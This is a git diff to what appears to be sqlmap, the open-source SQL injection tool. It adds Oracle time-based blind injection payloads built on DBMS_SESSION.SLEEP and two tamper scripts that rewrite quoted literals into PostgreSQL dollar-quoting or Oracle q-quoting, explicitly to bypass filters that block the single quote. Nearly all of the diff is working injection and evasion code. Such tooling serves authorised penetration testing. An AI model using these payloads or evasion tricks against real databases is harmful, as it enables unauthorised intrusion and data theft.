diff --git a/data/xml/payloads/time_blind.xml b/data/xml/payloads/time_blind.xml
index fe9de254c..1370b8b26 100644
--- a/data/xml/payloads/time_blind.xml
+++ b/data/xml/payloads/time_blind.xml
@@ -1776,6 +1776,26 @@
+
+
+ Oracle time-based blind - Parameter replace (DBMS_SESSION.SLEEP)
+ 5
+ 3
+ 1
+ 1,3,9
+ 3
+ BEGIN IF ([INFERENCE]) THEN DBMS_SESSION.SLEEP([SLEEPTIME]); ELSE DBMS_SESSION.SLEEP(0); END IF; END;
+
+ BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_SESSION.SLEEP([SLEEPTIME]); ELSE DBMS_SESSION.SLEEP(0); END IF; END;
+
+
+
+
+
+ Oracle
+
+
+
Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)
5
@@ -2072,6 +2092,25 @@
+
+ Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_SESSION.SLEEP)
+ 5
+ 3
+ 1
+ 2,3
+ 1
+ ,(BEGIN IF ([INFERENCE]) THEN DBMS_SESSION.SLEEP([SLEEPTIME]); ELSE DBMS_SESSION.SLEEP(0); END IF; END;)
+
+ ,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_SESSION.SLEEP([SLEEPTIME]); ELSE DBMS_SESSION.SLEEP(0); END IF; END;)
+
+
+
+
+
+ Oracle
+
+
+
Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)
5
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 4a6211421..5ec28a349 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -20,7 +20,7 @@ from lib.core.enums import OS
from thirdparty import six
# sqlmap version (...)
-VERSION = "1.10.7.70"
+VERSION = "1.10.7.71"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/tamper/dollarquote.py b/tamper/dollarquote.py
new file mode 100644
index 000000000..bb268b036
--- /dev/null
+++ b/tamper/dollarquote.py
@@ -0,0 +1,44 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+"""
+
+import os
+import re
+
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.LOW
+
+def dependencies():
+ singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.PGSQL))
+
+def tamper(payload, **kwargs):
+ """
+ Replaces single-quoted strings with PostgreSQL dollar-quoted strings (e.g. 'abc' -> $$abc$$)
+
+ Requirement:
+ * PostgreSQL
+
+ Tested against:
+ * PostgreSQL 9.x, 10-16
+
+ Notes:
+ * Useful to bypass filters that block, strip or escape the single-quote
+ character: dollar-quoting is quote-free and needs no escaping
+ * A literal already containing '$$' is left untouched
+
+ >>> tamper("SELECT 'abc' FROM t WHERE x='def'")
+ 'SELECT $$abc$$ FROM t WHERE x=$$def$$'
+ """
+
+ retVal = payload
+
+ if payload:
+ retVal = re.sub(r"'([^']*)'", lambda match: "$$%s$$" % match.group(1) if "$$" not in match.group(1) else match.group(0), payload)
+
+ return retVal
diff --git a/tamper/oraclequote.py b/tamper/oraclequote.py
new file mode 100644
index 000000000..6b0416357
--- /dev/null
+++ b/tamper/oraclequote.py
@@ -0,0 +1,53 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+"""
+
+import os
+import re
+
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.LOW
+
+def dependencies():
+ singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.ORACLE))
+
+def tamper(payload, **kwargs):
+ """
+ Replaces single-quoted strings with Oracle alternative-quoted strings (e.g. 'abc' -> q'[abc]')
+
+ Requirement:
+ * Oracle 10g+
+
+ Tested against:
+ * Oracle 11g, 12c, 18c, 19c, 21c, 23ai
+
+ Notes:
+ * Useful to bypass filters that block, strip or escape the single-quote
+ character: q-quoting delimits the literal with a chosen bracket/char
+ so the inner text needs no quote at all
+ * The first delimiter whose characters are absent from the literal is
+ used; a literal that contains every candidate delimiter is left untouched
+
+ >>> tamper("SELECT 'abc' FROM DUAL")
+ "SELECT q'[abc]' FROM DUAL"
+ """
+
+ def _quote(match):
+ value = match.group(1)
+ for start, end in (("[", "]"), ("{", "}"), ("(", ")"), ("<", ">"), ("!", "!"), ("|", "|"), ("#", "#")):
+ if start not in value and end not in value:
+ return "q'%s%s%s'" % (start, value, end)
+ return match.group(0)
+
+ retVal = payload
+
+ if payload:
+ retVal = re.sub(r"'([^']*)'", _quote, payload)
+
+ return retVal